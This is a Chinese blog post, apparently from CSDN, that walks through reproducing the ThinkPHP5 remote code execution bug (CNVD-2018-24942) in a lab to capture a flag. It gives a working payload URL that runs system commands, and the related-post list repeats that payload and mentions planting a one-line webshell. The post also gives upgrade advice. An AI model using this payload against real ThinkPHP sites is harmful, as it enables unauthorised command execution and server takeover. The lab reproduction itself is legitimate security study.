thinkphp 代码执行 (CNVD-2018-24942)

最新推荐文章于 2024-07-15 17:14:16 发布
最新推荐文章于 2024-07-15 17:14:16 发布
阅读量353 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48900801/article/details/119212300
版权

ThinkPHP5 远程代码执行 漏洞 修复 安全更新
关键词由CSDN通过智能技术生成

thinkphp 代码执行 (CNVD-2018-24942)

漏洞介绍

ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。
影响版本:

ThinkPHP 5.*,<5.1.31
ThinkPHP <=5.0.23
过程

1.开启靶场环境
在这里插入图片描述

2、在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp

/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp

如下:
http://192.168.xx.xx:xxxxx/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/tmp
3、成功得到flag

在这里插入图片描述

小结
此漏洞是因为框架对传入的路由参数过滤不严格,导致攻击者可以操作非预期的控制器类来远程执行代码。进一步分析发现,某些ThinkPHP版本不受已公开的POC的影响,这是由于该POC缺乏完备性考虑。因此,强烈建议用户及时将5.0.x版本升级到5.0.23,将5.1.x版本升级到5.1.31,以免遭受攻击。
漏洞修复
官方修复方案:https://blog.thinkphp.cn/869075

染指诉离殇
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp远程代码执行exp
07-29
thinkphp的远程代码执行漏洞的exp,版本通用,带检查,上传等功能。
漏洞通告ThinkPHP远程代码执行漏洞
05-05
【漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现
yzl_007的博客
08-04 1188
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现 影响范围 ThinkPHP 5.0.全版本 5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞。 漏洞复现 远程代码执行 直接get请求即可 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd pw
thinkphp3.2.x 代码执行
qq_23003811的博客
07-15 357
2、访问日志生成地址:/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_07_15.log,其中修改24_07_15为当天日期,解析phpinfo成功。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。1、构造payload:/index.php?
vulfocus——thinkphp代码执行(CNVD-2018-24942)
m0_62063669的博客
09-07 638
ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。4.访问一下http://ip/shell.php,然后用蚁剑连接,在/tmp下找到flag。2.构造payload远程代码执行,在/tmp下获得flag。3.我们还可以通过写入一句话木马的方式获得flag。
ThinkPHP5远程代码执行CNVD-2018-24942
ANOrange的博客
04-03 564
ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。本文包含POC和ThinkPHP漏洞利用工具
基于ThinkPHP8和Element-Plus的在线教育平台设计源码
04-04
本设计源码提供了一个基于ThinkPHP8和Element-Plus的在线教育平台。项目包含9313个文件,主要使用PHP编程语言,并包含了JavaScript、Vue、CSS、Java、微信小程序、C#、HTML、TypeScript和Shell。文件类型包括3516个...
Thinkphp最全教程-thinkphp PDF
最新发布
08-11
1熟悉 Thinkphp 1.1什么是 Thinkphp Thinkphp是一个开源的PHP框架,遵循Apache2开源协议发布。使用面向对象的开发结构和MVC模式,封装了CURD和一些常用操作,在模版引擎、缓存机制、认证机制和扩展性方面均有独特的...
Thinkphp-5-0远程代码执行漏洞1
08-03
### ThinkPHP 5.0 远程代码执行漏洞解析 #### 漏洞背景与概述 在本篇文章中,我们将深入探讨一个出现在ThinkPHP 5.0版本中的远程代码执行漏洞(RCE)。该漏洞的存在使得攻击者能够在满足特定条件的情况下,通过...
thinkphp3.23+B-JUI开发的CRM.rar
12-04
1. 快速:ThinkPHP提供了简洁的代码结构和高效的运行机制,使得开发速度得到显著提升。 2. 灵活:支持多种数据库,包括MySQL、SQLite、PostgreSQL等,且模型层支持多种数据库操作方式。 3. 安全:内置了防止SQL注入...
CNVD-2018-24942漏洞复现
尼德霍格007
07-15 945
CNVD-2018-24942漏洞复现 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-7-11 开始 打开靶场 http://45.159.48.193:42798/ 一个简单的getshell方法 远程代码执行 http://45.159.48.193:42798/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1
thinkphp-2x-rce 代码执行
yzl_007的博客
09-19 382
thinkphp-2x-rce 代码执行 打开环境 漏洞描述 ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 。 在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = pre
thinkphp-cnvd 2018 24942
Z_l123的博客
03-01 728
影响范围 ThinkPHP 5.0.全版本 5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞。 漏洞复现 1.访问地址 2.远程代码执行 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd 3.上传一句话木马 ?s=index/\think\tem
ThinkPhp 代码执行 (CNVD-2018-24942)漏洞复现
beichenyyds的博客
03-03 5078
漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 影响版本: ThinkPHP 5.*,<5.1.31 ThinkPHP <=5.0.23 过程 1.开启靶场环境 2、在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp http://vulfocus.fofa.so:43095/index.php/?s=index/\think\app/invokefunctio
ThinkPHP5代码执行的简单分析
aixuan9365的博客
12-13 494
漏洞影响版本: ThinkPHP 5.0.5-5.0.22 ThinkPHP 5.1.0-5.1.30 漏洞复现:   一.mac的debug环境搭建。     一键化环境搭建工具: mamp pro ,调试工具 PHPstorm     打开mamp pro,设置左上角的file->Edit Template, 设置httpd.conf (监听本地) ...
Thinkphp5 任意代码执行漏洞复现
satasun的博客
12-06 953
环境搭建 环境搭建 Github传送门 BUU传送门 菜鸡懒得动手直接上buu一键搭建环境 http://node3.buuoj.cn:28078/ POC 首页已经提示thinkphp5了,笔者推荐一款比较好用的谷歌插件Wappalyzer 直接分析出使用了php7.2.31(但是不懂为啥没分析出thinkPHP框架) 直接百度thinkPHP任意代码执行漏洞 大佬博客传送门 poc: http://node3.buuoj.cn:28078/?s=index/think\app/invokefunc
学习笔记-ThinkPHP5漏洞分析之代码执行(七)
人饭子的博客
11-09 1172
参考链接:Mochazz/ThinkPHP-Vuln/ 影响版本:5.0.7<=ThinkPHP5<=5.0.22 、5.1.0<=ThinkPHP<=5.1.30 测试环境:PHP7.3.4、Mysql5.7.26、TP5.0.18 5.1.x : ?s=index/\think\Request/input&filter[]=system&data...
vulfocus thinkphp 代码执行 (CNVD-2018-24942)
03-29
ThinkPHP是一款快速、简单的PHP开发框架,该框架在处理某些特定情况下的输入时存在代码执行漏洞。攻击者可以通过构造恶意的输入数据,利用该漏洞执行任意代码,从而控制服务器。 漏洞影响: ThinkPHP 5.0.x - ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值